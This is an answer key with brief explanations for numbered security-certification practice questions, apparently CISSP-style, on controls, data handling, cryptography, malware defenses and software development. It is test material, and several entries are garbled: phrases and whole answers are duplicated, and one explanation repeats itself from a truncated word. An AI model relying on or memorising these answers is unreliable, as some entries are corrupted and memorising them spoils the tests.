Answer: A. The strongest password Explanation: When you use a passphrase instead of a standard dictionary word as your password, you are essentially creating a stronger password. Passphrases are typically longer than traditional passwords, making it more difficult for attackers to guess or crack using brute force. They can include spaces and be more mnemonic, making them easier for users to remember.

Answer 821

Answer: C. Palm vein scanner Explanation: Biometric systems like palm vein scanners offer the highest level of security. These systems are unique to each individual and are more difficult to replicate or forge than passwords or smart cards.

Answer 822

Answer: A. Corrective control Explanation: Corrective controls are implemented in response to a security incident. They aim to limit the extent of any damage caused recover the the extent of any damage caused, recover the system’s normal functions, and correct any system weaknesses identified during the incident.

Answer 823

Answer: A. Create, use, share, store, archive, and destroy Explanation: The correct sequence of asset life cycle phases is create, use, share, store, archive, and destroy. This sequence reflects the typical progression of an asset’s life.

Answer 824

Answer: D. Detective control Explanation: Detective controls are designed to discover and react to occurring incidents. In this case, investigating a breach is an example of a detective control, as you are identifying the cause and impact of the incident that has already taken place.

Answer 825

Answer: A. Create, use, share, store, archive, and destroy Explanation: The correct sequence of asset life cycle phases is create, use, share, store, archive, and destroy. This sequence reflects the typical progression of an asset’s life.

Answer 826

Answer: B. The destruction of assets in a controlled, legally defensible, and compliant manner Explanation: Defensible destruction refers to destroying assets in a way that complies with legal and regulatory requirements and can be defended if questioned.

Answer 827

Answer: D. By outlining controls to protect valuable assets Explanation: Asset classification assists in identifying the most critical and valuable assets, enabling an organization to allocate resources and controls effectively to protect these assets. This leads to an improved ability to achieve its goals and objectives.

Answer 828

Answer: C. Data controller Explanation: In the context of data privacy, the data controller is the entity that determines the purposes and means of processing personal data purposes and means of processing personal data. They are responsible for ensuring that the processing complies with relevant laws and regulations.

Answer 829

Answer: B. Right to be Forgotten Principle Explanation: The Right to be Forgotten is not an OECD principle. It’s a provision from the General Data Protection Regulation (GDPR) of the European Union. The OECD principles include the Collection Limitation, Use Limitation, and Accountability principles, among others.

Answer 830

Answer: D. Data steward Explanation: While a data steward can help manage and enforce data policies, they’re not a requirement for effective retention requirements. Policies, education, training, and an understanding of compliance requirements are all necessary.

Answer 831

Answer: A. Specific steps that must be executed Explanation: Baseline security controls do provide a minimum level of security, can be associated with specific architectures and systems, and serve as a consistent reference point. However, they do not dictate specific steps that must be executed. While they set a base standard, the specific steps to achieve this standard can vary based on the organization’s unique needs and circumstances.

Answer 832

Answer: C. Limiting general baseline recommendations by removing those that do not apply Explanation: Scoping involves tailoring baseline security recommendations to fit the specific circumstances of an organization. This may involve removing recommendations that are not applicable, adding additional controls where necessary, or modifying existing recommendations to better suit the organization’s needs.

Answer 833

Answer: B. Selectively implementing parts of the standard or framework based on relevance Explanation: Scoping involves adapting a standard or framework to suit the specific circumstances of an organization, which might involve selecting only those parts that are relevant or useful to the organization.

Answer 834

Answer: B. Overwriting Explanation: Overwriting is the process of replacing existing data with new data, which can be used to effectively eliminate data remanence on rewritable memory like PROM, flash memory, and SSD drives.

Answer 835

Answer: C. Data in use Explanation: While data is in use, it is typically in an unencrypted state as it is being processed or accessed. Thus, it is difficult to apply encryption protection to data in this state.

Answer 836

Answer: C. EEPROM Explanation: Flash drives use Electrically Erasable Programmable Read-Only Memory (EEPROM), which allows data to be electrically erased and reprogrammed.

Answer 837

Answer: C. Exposure to UV light Explanation: Erasable Programmable Read-Only Memory (EPROM) can be erased by exposing it to strong UV light, allowing it to be rewritten.

Answer 838

Answer: D. Clean desk policies, print policies, job rotation, mandatory vacations, and view angle screens Explanation: All these measures can contribute to Explanation: All these measures can contribute to protecting data in use. The need-to-know policy, while valuable, does not directly address the protection of data in use.

Answer 839

Answer: D. Clean desk policies, print policies, job rotation, mandatory vacations, and view angle screens Explanation: All these measures can contribute to Explanation: All these measures can contribute to protecting data in use. The need-to-know policy, while valuable, does not directly address the protection of data in use.

Answer 840

Answer: C. Encryption Explanation: Encryption is a primary method for protecting data at rest. It renders the data unreadable without the correct decryption key, thereby protecting it even if physical security measures fail.

Answer 841

Answer: C. As long as it is useful or required, whichever is longer Explanation: The duration for keeping backups should be based on both the utility of the data and any legal or regulatory requirements. Some data may need to be kept for a specific period due to regulations, while other data may be useful for business purposes for a certain length of time.

Answer 842

Answer: A. DRAM Explanation: Dynamic Random Access Memory (DRAM) is a type of volatile memory. It retains data as long as it’s powered on, but once the power is turned off, the data is lost.

Answer 843

Answer: A. DRAM Explanation: Dynamic Random Access Memory (DRAM) is a type of volatile memory. It retains data as long as it’s powered on, but once the power is turned off, the data is lost.

Answer 844

Answer: C. PROM Explanation: Programmable Read-Only Memory (PROM) can be programmed using a special device. This process can only happen once. Once the PROM has been programmed, the data written to it is permanent and cannot be erased or rewritten.

Answer 845

Answer: B. To ensure there is no data remanence Explanation: Multiple forms of data destruction are used to ensure there is no data remanence, which means ensuring that no remnants of data which means ensuring that no remnants of data remain that could be potentially recovered.

Answer 846

Answer: A. Cryptanalysis Explanation: Cryptanalysis, or attempting to break encryption or cryptographic systems, is a common attack method targeting data at rest.

Answer 847

Answer: D. Proper data encryption Explanation: Encryption is a process that transforms readable data into unreadable data. An attacker could not access the data without the decryption key if the backup tapes were adequately encrypted.

Answer 848

Answer: A. Unclassified Explanation: In US government data classification, data that wouldn’t harm national security if disclosed is typically classified as “Unclassified.”

Answer 849

Answer: A. Stealing unencrypted laptops Explanation: Stealing unencrypted laptops is a common attack against data at rest because the data on these devices is easy to access if not encrypted.

Answer 850

Answer: C. Where do we keep the backup data? Explanation: While the location of the backup data is an important aspect of data management, it is not directly related to the data retention policy, which focuses on the duration and manner of data retention.

Answer 851

Answer: A. Minimal use of paper copies and only used while at the desk and in use Explanation: A clean desk policy typically involves minimizing the use of paper copies and ensuring they are only in use while at the desk, to prevent unauthorized access to sensitive information.

Answer 852

Answer: A. Data remanence Explanation: The primary purpose of data disposal is to eliminate data remanence, or residual data that remains after data deletion or erasure, which could be potentially recovered and exploited.

Answer 853

Answer: D. How the data will be used Explanation: Although how the data is used can influence its sensitivity, the primary factors in determining sensitivity are who has access, its value, and the potential impact of its exposure.

Answer 854

Answer: D. Shredding Explanation: Shredding, or physically destroying the SSD, is one of solid-state drives’ most secure data disposal methods.

Answer 855

Answer: A, C, D, E. Clean desk policy, View angle privacy screen for monitors, Print policy, Workstation locking Explanation: All of these, except encryption, are strategies that can be used to protect data. Encryption is typically used for data at rest or in motion.

Answer 856

Answer: D. All of these Explanation: When dealing with sensitive data, it is important to encrypt all these forms of data storage and transmission to ensure the security of the data.

Answer 857

Answer: B. Perform the backups and restores Explanation: A data custodian’s primary role is to manage and handle the data, which includes performing backups and restorations.

Answer 858

Answer: C. Eavesdropping Explanation: Eavesdropping, or interception of information in transit, is a common type of attack on data in motion.

Answer 859

Answer: A. Proper data handling Explanation: Implementing logs to monitor who accesses what data on your backup servers is an example of proper data handling. This is a measure to ensure accountability and traceability in the event of any unauthorized or suspicious activities.

Answer 860

Answer: C. Incinerate Explanation: While all options can erase data, incineration is the most thorough method to ensure there is no data remanence on SSD drives. It physically destroys the drives, making data recovery impossible.

Answer 861

Answer: B. The CFO Explanation: The CFO, or Chief Financial Officer, is typically responsible for the day-to-day financial leadership of an organization.

Answer 862

Answer: B. Produce electronic information to internal or external attorneys or legal teams Explanation: The e-discovery process typically involves producing electronic information for internal or external legal teams in preparation for legal proceedings.

Answer 863

Answer: C. Secret Explanation: In the US government’s data classification scheme, information is classified as Secret when its unauthorized disclosure could reasonably be expected to cause serious damage to national security.

Answer 864

Answer: C. Data in motion Explanation: End-to-end encryption is most relevant for data in motion. It’s a secure communication method that prevents third parties from accessing data while it’s transferred from one end system to another.

Answer 865

Answer: C. To protect the confidentiality, integrity, and availability of data Explanation: The primary goal of information classification is to protect the confidentiality, integrity, and availability of data by identifying the sensitivity of data and implementing suitable controls to protect it.

Answer 866

Answer: C. Top Secret Explanation: The Top Secret classification is typically used within government organizations, not the private sector.

Answer 867

Answer: B. Data owner Explanation: The data owner, who is usually someone with appropriate authority within the organization, is typically responsible for data classification.

Answer 868

Answer: B. Implement controls as defined by the data owner Explanation: The data custodian is responsible for the implementation of the controls defined by the data owner, including storage, protection, and retrieval of datasets.

Answer 869

Answer: A. Data that remains on a storage medium after it has been deleted Explanation: Data remanence refers to the residual representation of data that remains even after attempts have been made to remove or erase the data.

Answer 870

Answer: A. To define how long data should be kept before it is deleted Explanation: A data retention policy outlines how long data should be stored based on regulatory requirements, business needs, and data value.

Answer 871

Answer: C. The size of the data Explanation: While the size of the data may affect storage requirements, it typically does not determine the length of data retention periods.

Answer 872

Answer: B. To protect the rights of individuals with respect to their personal data Explanation: The primary goal of privacy laws and regulations is to protect individuals’ rights regarding their personal data, including how it is collected, stored, used, and shared.

Answer 873

Answer: D. Destruction Explanation: The final stage of the information life cycle is typically destruction, during which data is destroyed in a way that ensures it cannot be reconstructed or recovered.

Answer 874

Answer: A. Preventative Explanation: Encryption is a preventative control that protects data confidentiality and integrity by transforming plaintext into ciphertext that is unreadable without the decryption key

Answer 875

Stream Cipher

Answer 876

Block Cipher

Answer 877

Substitution

Answer 878

Transposition

Answer 879

initialization vector (IV)

Answer 880

One Time Pad

Answer 881

One Time Pad

Answer 882

Zero Knowledge proof

Answer 883

Split Knowledge

Answer 884

Work function - Work factor

Answer 885

Asymmetric

Answer 886

Asymmetric

Answer 887

Confidentiality

Answer 888

Non Repudiation

Answer 889

Electronic Codebook Mode (ECB)

Answer 890

Cipher Block (CBC)

Answer 891

Cipher Feedback (CFB)

Answer 892

Output Feedback (OFB)

Answer 893

Counter (CTR)

Answer 894

Output Feedback (OFB) Counter (CTR)

Answer 895

Key clustering

Answer 896

Public Keys

Answer 897

Private Keys

Answer 898

Use the recipients public key

Answer 899

Use your own private key

Answer 900

Use your own private key

Answer 901

Use the senders public key

Answer 902

c. Virus scanners, being one of reactive (detective) countermeasures, search for “signature strings” or use algorithmic detection methods to identify known viruses. These reactive methods have no hope of preventing fast spreading worms or worms that use zero-day exploits to carry out their attacks. The other three choices are examples of proactive (preventive) countermeasures. Packet-filtering firewalls block all incoming traffic except what is needed for the functioning of the network. Stack guarding prevents worms from gaining increased privileges on a system. A virtual machine prevents potentially malicious software from using the operating system for illicit actions.

Answer 903

b. Acquiring tools and resources is a part of the preparation phase. These tools and resources may include packet sniffers and protocol analyzers. The other three choices are incorrect because they are a part of the detection phase. The malware incident response life cycle has four phases, including (i) preparation, (ii) detection and analysis, (iii) containment, eradication, and recovery, and (iv) post-incident activity.

Answer 904

a. Basic testing is a test methodology that assumes no knowledge of the internal structure and implementation details of the assessment object. Basic testing is also known as black-box testing. Comprehensive testing is a test methodology that assumes explicit and substantial knowledge of the internal structure and implementation detail of the assessment object. Comprehensive testing is also known as white- box testing. Focused testing is a test methodology that assumes some knowledge of the internal structure and implementation detail of the assessment object. Focused testing is also known as gray-box testing.

Answer 905

a. In a widespread incident, if malware cannot be identified by updated antivirus software, or updated signatures are not yet fully deployed, organizations should be prepared to use other security tools to contain the malware until the antivirus signatures can perform the containment effectively. Expecting antivirus software to handle the complete workload of a malware incident is unrealistic during high volume infections. By using a defense-in-depth strategy for detecting and blocking malware, an organization can spread the workload across multiple components. Antivirus software alone cannot ensure defense in-depth strategy. Automated detection methods other than antivirus software are needed to ensure defense-in-depth strategy. These detection methods include e-mail filtering, network-based intrusion prevention system (IPS) software, and host-based IPS software.

Answer 906

b. A stealth virus is a resident virus that attempts to evade detection by concealing its presence in infected files. An active stealth file virus can typically not reveal any size increase in infected files, and it must be active to exhibit its stealth qualities.

Answer 907

b. Organizations should identify which individuals or groups can assist in infection identification efforts. System administrators are good at identifying infected servers such as domain name system (DNS), email, and Web servers. The roles of the other three administrators are different from separation of duties, independence, and objectivity viewpoints.

Answer 908

b. Spam-filtering software, whether host-based or network-based, is effective at stopping known email-based malware that uses the organization’s e-mail services and is effective at stopping some unknown malware. The most common tools for eradication are antivirus software, spyware detection and removal utility software, patch management software, and dedicated malware removal tool.

Answer 909

d. If an incident has resulted in unauthorized administrator-level access, changes to system files, unstable system, and the extent of damage is unclear, organizations should be prepared to rebuild each affected system.

Answer 910

d. Rebuild each affected system by reinstalling and reconfiguring its operating system and applications, securing the operating system and applications, and restoring the data from known good backups.

Answer 911

d. Capturing the lessons following the handling of a malware incident should help an organization improve its incident handling capability and malware defenses, including needed changes to security policy, software configurations, and malware detection and prevention software deployments.

Answer 912

c. When organizations develop strategies for malware incident containment, they should consider developing tools to assist incident handlers in selecting and implementing containment strategies quickly when a serious incident occurs. Network- and host-based antivirus software does detect and stop the worm, and identify and clean the infected systems. Host-based firewalls do block worm activity from entering or exiting hosts, reconfigure the host-based firewall itself to prevent exploitation by the worm, and update the host-based firewall software so that it is no longer exploitable. Network-based firewalls do detect and stop the worm from entering or exiting networks and subnets. Internet border and internal routers do detect and stop the worm from entering or exiting networks and subnets if the volume of traffic is too high for network firewalls to handle or if certain subnets need greater protection. The incorrect sequences listed in the other three choices does not contain malware incidents because their combined effect is not as strong and effective as the correct sequence.

Answer 913

b. Requiring administrator-level privileges is a characteristic of a non managed environment, where system owners and users have substantial control over their own system. Owners and users can alter system configurations, making security weak. In a managed environment, one or more centralized groups have substantial control over the server and workstation operating system and application configurations across the enterprise. Recommended security practices include installing antivirus software on all hosts and keeping it up-to date, using deny-by-default policies on firewalls, and applying patches to operating systems and applications. These practices enable a consistent security posture to be maintained across the enterprise.

Answer 914

c. Conceptually, behavioral controls can be viewed as a software cage or quarantine mechanism that dynamically intercepts and thwarts attempts by the subject code to take unacceptable actions that violate policy. As with firewalls and antivirus products, methods that dynamically restrain mobile code were born out of necessity to supplement existing mechanisms, and represent an emerging class of security product. Such products are intended to complement firewall and antivirus products that respectively block network transactions or mobile code based on predefined signatures (i.e., content inspection), and may refer to methods such as dynamic sandbox, dynamic monitors, and behavior monitors, used for controlling the behavior of mobile code. In addition to mobile code, this class of product may also be applicable to stationary code or downloaded code whose trust worthiness is in doubt. Technical controls, administrative controls, and physical controls are incorrect because they are not strong enough as the behavioral controls to combat mobile code.

Answer 915

A. Application access is basic, low-privilege access. It may include access to data entry, data update, data query, data output, or report programs. Administrative access, privileged access, and root access are advanced levels of access to a computer system that include the ability to perform significant configuration changes to the computer’s operating system.

Answer 916

C. The cost not to mitigate = W × T × R, where W is the number of computers or workstations, T is the time spent fixing systems plus lost user productivity, and R is the hourly rate of time spent or lost. During downtime, the computer owner or user is without a computer to do his work, which should be added to the time required to rebuild a computer. This is translated into $560,000 (i.e., 1,000 computers × 8 hours × $70 per hour). $280,000 is incorrect because it fails to take into account the lost user productivity time. This is translated into $280,000 (i.e., 1,000 computers × 4 hours × $70 per hour). $500,000 is incorrect because it assumes the budget for in-house technical support. $600,000 is incorrect because it assumes the budget for outsourced technical support.

Answer 917

D. The major principle of configuration management is to provide a repeatable mechanism for effecting system modifications in a controlled environment. Achieving repeatable mechanism can automatically achieve the other three choices.

Answer 918

A. The Reference Monitor concept is an access control concept that refers to an abstract computer mediating all accesses to objects by subjects. It is useful to any system providing multilevel secure computing facilities and controls.

Answer 919

D. A common virus is a code that plants a version of itself in any program it can modify. It is a self-replicating code segment attached to a host executable. The boot-sector virus works during computer booting, where the master boot sector and boot sector code are read and executed. A worm is a self-replicating program that is self-contained and does not require a host program. A multi-partite virus combines both sector and file infector viruses.

Answer 920

c. Built-in security means that security features are designed into the system during its development, not after. Any feature that is installed during post-implementation of a system is an example of built-on security, not built-in. Security and control features must be built in from a cost-benefit perspective.

Answer 921

c. System assurance is the basis for confidence that the security measures, both technical and operational, work as intended to protect the system and the data and information it processes. For example, software assurance achieves trustworthiness and predictable execution. The three well-accepted and basic-level security objectives are confidentiality, integrity, and availability, and assurance can be considered an advanced-level security objective because the former culminates into the latter. What good is an information system that cannot provide full assurance with regards to its security?

Answer 922

b. Antivirus software is a preventive control in that it stops a known virus from getting into a computer system. It is also a detective control because it notifies upon detecting a known virus. Audit trails are detective controls; policies and procedures are directive controls, whereas contingency plans are an example of recovery controls.

Answer 923

b. Computer virus defenses are expensive to use, ineffective over time, and ineffective against serious attackers. Virus scanning programs are effective against viruses that have been reported and ineffective against new viruses or viruses written to attack a specific organization. Program change controls limit the introduction of unauthorized changes such as viruses. Redundancy can often be used to facilitate integrity. Integrity checking with cryptographic checksums in integrity shells is important to defend against viruses. System or equipment isolation to limit the spread of viruses is good, too.

Answer 924

c. Defending an information system requires safeguards to be applied throughout the system, as well as at points of entry. The selection and placement of security controls should be done in a way that progressively weakens or defeats all attacks. Having a series of similar controls in succession tends to only lengthen the duration of the attack, which is not good. Applying different types of controls that complement each other and are mutually supportive is a much more effective approach in achieving defense-in-depth strategy. Although the capabilities of available safeguards may overlap to some extent, the combined effect should exceed the effects of each control used individually. The other three choices are true statements in achieving security in an application environment. The information system isolates security functions from non security functions implemented via partitions and domains that control access to and protects the integrity of the hardware, software, and firmware that perform those security functions. Safety functions should be kept separate from one another. The design of information systems and the design of protection mechanisms in those systems should be as simple as possible. Complexity is at the root of many security issues. The principle of data hiding should be useful during program testing and software maintenance.

Answer 925

b. During the system development phase, the system is designed, purchased, programmed, developed, or otherwise constructed. During this phase, functional users and system/security administrators develop system controls and audit trails used during the operational phase.

Answer 926

b. In the repeatability level of the software capability maturity model, system requirements are defined; these include security, performance, quality, and delivery dates. The purpose is to establish a common understanding between the customer and the software development project team. The other three choices are not correct because each level deals with specific requirements.

Answer 927

B. Data leakage is removal of data from a system by covert means, and it might be conducted directly through the use of Trojan horse, logic bomb, or scavenging methods. Asynchronous attacks are indirect attacks on a computer program that act by altering legitimate data or codes at a time when the program is idle and then causing the changes to be added to the target program at later execution.

Answer 928

C. Multi-partite viruses are a combination of both sector- and file infector viruses, which can be spread by both methods. A worm is a self-replicating, self-contained program and does not require a host program. Link viruses manipulate the directory structure of the media on which they are stored, pointing the operating system to virus code instead of legitimate code. Macro viruses are stored in a spreadsheet or word processing document.

Answer 929

c. Backdoors are also called hooks and trapdoors. Logic bomb is incorrect because it is a program that triggers an unauthorized, malicious act when some predefined condition occurs. Worms are incorrect because they search the network for idle computing resources and use them to execute the program in small segments. Trojan horses are incorrect because a Trojan horse is a production program that has access to otherwise unavailable files and is changed by adding extra, unauthorized instructions. It disguises computer viruses.

Answer 930

a. Some vendors can install a backdoor or a trapdoor entry for remote monitoring and maintenance purposes. The good news is that the backdoor is a convenient approach to solve operational problems. The bad news is that the backdoor is wide open for hackers. Also, the vendor can modify the software at will without the user’s knowledge or permission. An unhappy vendor can disconnect a user from accessing the software as a penalty for nonpayment or disputes in payment. Access codes should be required for remote monitoring and maintenance.

Answer 931

c. Hidden code attacks are based on data and information. Using layered protections and disabling active-content code (for example, ActiveX and JavaScript) from the Web browser are effective controls against such attacks. War dialing software is good at detecting trapdoors (backdoor modems) and not good against trapdoor attacks. Firewalls are effective against spoofing attacks.

Answer 932

a. Evaluation of change control is a part of the physical configuration audit, whereas the other choices are part of the functional configuration audit. The physical configuration audit provides an independent evaluation of whether components in the as-built version of the software map to the specifications of the software. Specifically, this audit is held to verify that the software and its documentation are internally consistent and ready for delivery. Activities typically planned and executed as part of the physical configuration audit include evaluation of product composition and structure, product functionality, and change control. The functional configuration audit provides an independent evaluation of configuration items to determine whether actual functionality and performance are consistent with the requirements specifications. Specifically, this audit is conducted prior to the software delivery to verify that all requirements specified in the requirements document have been met. Activities typically planned and executed as part of a functional configuration audit include testing of software products, tracing of system requirements from their initial specification through system testing, evaluation of the test approach and results attained, and evaluating the consistency between the baselined product elements

Answer 933

a. Applets are small application programs mostly written in Java programming language that are automatically downloaded and executed by applet-enabled Web browsers.

Answer 934

c. The contingency processes should be tested and maintained during the implementation phase of the SDLC. The capability to recover and reconstitute data should be considered during the initiation phase. Recovery strategies should be considered during the development phase. The contingency plan should be exercised and maintained during the operation/maintenance phase.

Answer 935

b. A macro virus is associated with a word processing file, which can damage the computer system. Macro viruses pass through the firewall with ease because they are usually passed on as either an email message or simply downloaded as a text document. The macro virus represents a significant threat because it is difficult to detect. A macro virus consists of instructions in Word Basic, Visual Basic for applications, or some other macro languages, and resides in documents. Any application that supports macros that automatically execute is a potential platform for macro viruses. Now, documents are more widely shared through networks and the Internet than via disks.

Answer 936

a. Because the discretionary access control system restricts access based on identity, it carries with it an inherent flaw that makes it vulnerable to Trojan horse attacks. Most programs that run on behalf of a user inherit the discretionary access control rights of that user.

Answer 937

c. Virus checkers monitor computers and look for malicious code. A problem is that virus-checking programs need to be installed at each computer, workstation, or network, thus duplicating the software at extra cost. The best place to use the virus-checking programs is to scan e-mail attachments at the e-mail server. This way, the majority of viruses are stopped before ever reaching the users.

Answer 938

d. In cross-site scripting (XSS) flaws, the Web application can be used as a mechanism to transport an attack to an end user’s browser. A successful attack can disclose the end user’s session token, attack the local machine, or spoof content to fool the user.

Answer 939

c. Virus writers use a mutation engine to transform simple viruses into polymorphic ones for proliferation purposes and to evade detection. The other three choices do not deal with the transformation process.

Answer 940

d. A security kernel is defined as hardware, firmware, and software elements of a Trusted Computing Base (TCB) that implements the reference monitor concept. A security kernel cannot achieve process isolation. Techniques such as encapsulation, time multiplexing of shared resources, naming distinctions, and virtual mapping are used to employ the process isolation or separation principle. These separation principles are supported by incorporating the principle of least privilege.

Answer 941

d. Organizations should identify which individuals or groups can assist in infection identification efforts. Desktop administrators are good at identifying changes in login scripts along with Windows Registry or file scans, and good at implementing changes in login scripts. The roles of the other three administrators are different from separation of duties, independence, and objectivity viewpoints.

Answer 942

b. Software patching, being one of reactive (detective) countermeasures, is mostly done after vulnerability or programming/design error is discovered. These reactive methods have no hope of preventing fast-spreading worms or worms that use zero day exploits to carry out their attacks. The other three choices are examples of proactive (preventive) countermeasures. Integrity checkers keep cryptographic hashes of known good instances of files so that integrity comparisons can be made at any time. Host firewalls enforce rules that define the manner in which specific applications may use the network. Stateful firewalls keep track of network connections and monitor their state.

Answer 943

c. It is a common practice for some organizations to certify all removable media disks coming into the organization from outside prior to their use. This is done by a centralized group for the entire location and requires testing the disk for possible inclusion of viruses. The other three choices are effective as internal protection mechanisms against viruses.

Answer 944

c. Passwords are administrative controls; although, access controls are technical controls. Access controls include discretionary access controls and mandatory access controls. An audit trail is the collection of data that provides a trace of user actions, so security events can be traced to the actions of a specific individual. To fully implement an audit trails program, audit reduction and analysis tools are also required. Least privilege is a concept that deals with limiting damage through the enforcement of separation of duties. It refers to the principle that users and processes should operate with no more privileges than those needed to perform the duties of the role they are currently assuming.

Answer 945

b. The goal of work factor principle is to increase an attacker’s work factor in breaking an information system or a network’s security features. The amount of work required for an attacker to break the system or network (work factor) should exceed the value that the attacker would gain from a successful compromise. Various variables such as cost and benefit; effort; value (negative and positive); time; tools and techniques; gains and losses; knowledge, skills, and abilities (KSAs); and risks and opportunities involved in a successful compromise of security features must be balanced. The principle of compromise recording means computer or manual records and logs should be maintained so that if a compromise does occur, evidence of the attack is available. The recorded information can be used to better secure the host or network in the future and can assist in identifying and prosecuting attackers. The principle of psychological acceptability encourages the routine and correct use of protection mechanisms by making them easy to use, thus giving users no reason to attempt to circumvent them. The security mechanisms must match the user’s own image of protection goals. The principle of least common mechanism requires the minimal sharing of mechanisms either common to multiple users or depended upon by all users. Sharing represents posb. The goal of work factor principle is to increase an attacker’s work factor in breaking an information system or a network’s security features. The amount of work required for an attacker to break the system or network (work factor) should exceed the value that the attacker would gain from a successful compromise. Various variables such as cost and benefit; effort; value (negative and positive); time; tools and techniques; gains and losses; knowledge, skills, and abilities (KSAs); and risks and opportunities involved in a successful compromise of security features must be balanced. The principle of compromise recording means computer or manual records and logs should be maintained so that if a compromise does occur, evidence of the attack is available. The recorded information can be used to better secure the host or network in the future and can assist in identifying and prosecuting attackers. The principle of psychological acceptability encourages the routine and correct use of protection mechanisms by making them easy to use, thus giving users no reason to attempt to circumvent them. The security mechanisms must match the user’s own image of protection goals. The principle of least common mechanism requires the minimal sharing of mechanisms either common to multiple users or depended upon by all users. Sharing represents possible communications paths between subjects used to circumvent security policy.

Answer 946

d. The major outputs from the implementation (testing) phase include the security evaluation report and accreditation statement. The purpose of the testing phase is to perform various tests (unit, integration, system, and acceptance). Security features are tested to see if they work and are then certified.

Answer 947

d. Certifications performed on applications under development are interleaved with the system development process. Certification and accreditation needs must be considered in the validation, verification, and testing phases employed throughout the system development process (i.e., development and implementation). It does not address the operation/maintenance phase.

Answer 948

a. Managers still need to define what they want from the system, some assessment of costs/benefits is still needed, and a plan to proceed with individual responsibilities is still required. The difference may be in the way activities are accomplished. The tools, techniques, methods, and approaches used in the prototype development project and traditional system development project are different

Answer 949

c. System testing, which is a part of implementation, is important to determine whether internal controls and security controls are operating as designed and are in accordance with established policies and procedures. In the prototyping environment, there is a tendency to compress system initiation, definition, design, programming, and training phases. However, the testing phase should not be compressed so much for quality reasons. By definition, prototyping requires some compression of activities and time due to the speedy nature of the prototyping development methodology without loss of the main features, functions, and quality.

Answer 950

C. Each test program involves preparing the executable program, executing it, and deleting it. This saves space on mass storage and generates a complete log. This approach is recommended for debugging and validating purposes. Read, insert, and delete include the transfer of all rows from Table A to Table B in that a table is read, inserted, and deleted. A source program is precompiled, linked, and compiled to become an object or executable program. A source program is tested (errors discovered), debugged (errors removed), and logged for review and further action

Answer 951

c. The purpose of end-to-end testing is to verify that a defined set of interrelated systems, which collectively support an organizational core business area or function, interoperate as intended in an operational environment. These interrelated systems include not only those owned and managed by the organization, but also the external systems with which they interface. Unit test is incorrect because its purpose is to verify that the smallest defined module of software (i.e., individual subprograms, subroutines, or procedures) works as intended. These modules are internal to an organization. Integration test is incorrect because its purpose is to verify that units of software, when combined, work together as intended. Typically, a number of software units are integrated or linked together to form an application. Again, this test is performed internally in an organization. System acceptance test is incorrect because its purpose is to verify that the complete system satisfies specified requirements and is acceptable to end users.

Answer 952

b. A test tool cannot guarantee error-free software; it is neither a cure-all nor a silver bullet. For some, it may give a false sense of security. The test tool still requires careful planning, time, effort, and experience from which it can use and benefit.

Answer 953

c. Errors are made in several places and times: (i) when source code is developed, (ii) when modules are initially written, (iii) when an enhancement is being added to a module, (iv) when another error is fixed, and (v) when code is being moved from one module to another. Software configuration management products have a backtracking feature to correct these types of errors. The product should list the exact source code changes that make up each build. Then, these changes are examined to identify which one can create the new error. The concept of check-in/check-out software enables multiple developers to work on a project without overwriting one another’s work. It is a fundamental method of preventing errors from being included or reintroduced into software modules.

Answer 954

c. The test repository consists of test plans, test cases, test procedures, test requirements, and test objectives maintained by the software test manager. Because of the concentrated work products, the test repository needs a higher level of security protection from unauthorized changes. Test procedures, test cases, and test plans are part of test repository.

Answer 955

b. An unattended computer terminal represents a severe security violation. An unauthorized user could seize the opportunity to access sensitive data. The data could be copied, deleted, added to, or modified. An intruder can also use this occasion to modify executable files. A virus, Trojan horse, or a password-sniffing program could easily be slipped onto the system in no time. Security logic that detects an idle terminal is needed. Unattended computer operations are incorrect because they represent a situation where most of computer operational tasks are performed by machines (robots) and less with people. Unattended software testing is incorrect because testing is conducted by automated test tools without a person watching the testing process. The test tool continues running the test sessions by replaying one or more test scripts. It handles unforeseen circumstances gracefully. Unattended facsimile machine is incorrect because it can lead to social engineering attacks. The unattended computer operations, software testing, and facsimile machine pose less risk than the unattended computer terminal.

Answer 956

c. A reusable library can improve software productivity and quality by increasing the efficient reuse of error-free code for both new and modified application software. “Who owns the reusable code?” is a legal question that requires a careful answer due to difficulty in tracing to the original author of the software. A test library is incorrect because it is where the new software is developed or the existing software is modified. A quality assurance library is incorrect because it is a staging area where final quality reviews and production setup procedures take place. A production library is incorrect because it is the official place where operational programs reside and execute to process data. Data ownership rights in these three libraries (test, quality assurance, and production) are clear and traceable to the author(s).

Answer 957

c. Fan-in and fan-out are based on program coupling. Fan-in is a count of the number of modules that call a given module, and fan-out is a count of the number of modules that are called by a given module. Both fan-in and fan-out measure program complexity. Check-in and check-out are program change controls where documents or data/program files will have a check-in or check-out indicator in system libraries to prevent their concurrent use by programmers and computer programs.

Answer 958

d. The big-bang approach puts all the units or modules together at once, with no stubs or drivers. In it, all the program units are compiled and tested at once. Top-down approach is incorrect because it uses stubs. The actual code for lower level units is replaced by a stub, which is a throwaway code that takes the place of the actual code. Bottom-up approach is incorrect because it uses drivers. Units at higher levels are replaced by drivers that emulate the procedure calls. Drivers are also a form of throwaway code. Sandwich approach is incorrect because it uses a combination of top-down (stubs) and bottom-up (drivers) approaches.

Answer 959

d. A walkthrough is an evaluation technique in which a designer or programmer leads one or more other members of the development team through a segment of design or code, whereas the other members ask questions and make comments about technique, style, and identify possible errors, violations of development standards, and other problems. Walkthroughs are similar to reviews but are less formal. Inspections are incorrect because they are an evaluation technique in which application software requirements, design, code, or other products are examined by a person or group other than the author to detect faults, violations of development standards, and other problems. Inspections are more formal than walkthroughs. Traceability analysis is incorrect because it is the process of verifying that each specified requirement has been implemented in the design/code, that all aspects of the design/code have their basis in the specified requirements, and that testing produces results compatible with the specified requirements. Traceability analysis is more formal than walkthroughs. Reviews are incorrect because a review is a meeting at which the requirements, design, code, or other products of software development project are presented to the user, sponsor, or other interested parties for comment and approval, often as a prerequisite for concluding a given phase of the software development process. Reviews are more formal than walkthroughs.

Answer 960

d. An inspection is an evaluation technique in which software requirements, design, code, or other products are examined by a person or group, other than the author, to detect faults, violations of development standards, and other problems. input/output description errors are detected in the interface testing phase. The type of errors detected in inspections includes incomplete requirements errors, infeasible requirements errors, and conflicting requirements errors.

Answer 961

a. The purpose of decision tables is to provide a clear and coherent analysis of complex logical combinations and relationships. This method uses two-dimensional tables to concisely describe logical relationships between Boolean program variables (for example, AND and OR). Advantages of decision tables include (i) their conciseness and tabular nature enables the analysis of complex logical combinations expressed in code and (ii) they are potentially executable if used as specifications. Disadvantages include that they require tedious effort. The requirements analysis, which is a part of initiation phase, is the best place to use the decision table.

Answer 962

